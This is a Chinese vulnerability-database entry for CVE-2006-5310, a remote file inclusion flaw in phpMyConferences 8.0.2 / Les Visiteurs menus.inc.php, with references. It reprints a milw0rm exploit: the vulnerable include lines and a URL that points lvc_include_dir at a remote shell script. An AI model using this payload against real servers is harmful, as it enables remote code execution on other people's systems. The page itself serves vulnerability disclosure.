J-Pierre DEZELUS Les Visiteurs 'menus.inc.php'PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111281 漏洞类型 代码注入
发布时间 2006-10-13 更新时间 2006-10-17
CVE编号 CVE-2006-5310 CNNVD-ID CNNVD-200610-257
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/2535
https://www.securityfocus.com/bid/84588
https://cxsecurity.com/issue/WLB-2006100097
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-257
|漏洞详情
J-PierreDEZELUSLesVisiteurs2.0.1当在phpMyConferences(phpMyConference)8.0.2及可能的其他产品中时使用时,其common/visiteurs/include/menus.inc.php中存在的PHP远程文件包含漏洞,远程攻击者可以通过lvc_include_dir参数中的URL来执行任意PHP代码。
|漏洞EXP
#########################################################################
# phpMyConferences <= 8.0.2 Remote File Inclusion
# Download Source : http://sedre.loria.fr/phpMyConference/phpMyConferences_8.0.2.zip
#
# Found By        : k1tk4t - k1tk4t[4t]newhack.org
# Location        : Indonesia   --  #newhack[dot]org
########################################################################
file ;
 menus.inc.php
########################################################################
bugs ;
 include($lvc_include_dir.'/menus-'.$view.'.inc.php');
 include($lvc_include_dir.'/menus-others.inc.php');
########################################################################
exmple and methode exploit ;
 http://localhost/phpMyConferences_8.0.2/common/visiteurs/include/menus.inc.php?lvc_include_dir=http://shell/cmd.kid?
########################################################################
Thanks;
str0ke
milw0rm
google
#e-c-h-o (all member echo community)
#nyubi (all member solpotcrew community)
#asiahacker
person;
y3dips,lirva32,the_day,K-159(&all echo staff)
evilcode,illibero,NoGe(asiahacker),
nyubi,x-ace,ghoz,home_edition2001,matdhule,iFX,and for all(friend's&enemy)

# milw0rm.com [2006-10-13]
|受影响的产品
Phpmyconferences Phpmyconferences 8.0.2 J-Pierre Dezelus Les Visiteurs 2.0.1
|参考资料

来源:XF
名称:phpmyconferences-menus-file-include(29514)
链接:http://xforce.iss.net/xforce/xfdb/29514
来源:BUGTRAQ
名称:20061013phpMyConferences<=8.0.2RemoteFileInclusion
链接:http://www.securityfocus.com/archive/1/archive/1/448547/100/0/threaded
来源:MILW0RM
名称:2535
链接:http://www.milw0rm.com/exploits/2535
来源:VUPEN
名称:ADV-2006-4045
链接:http://www.frsirt.com/english/advisories/2006/4045
来源:SECUNIA
名称:22411
链接:http://secunia.com/advisories/22411
来源:MILW0RM
名称:2535
链接:http://milw0rm.com/exploits/2535
来源:BID
名称:20505
链接:http://www.securityfocus.com/bid/20505
来源:SREASON
名称:1733
链接:http://securityreason.com/securityalert/1733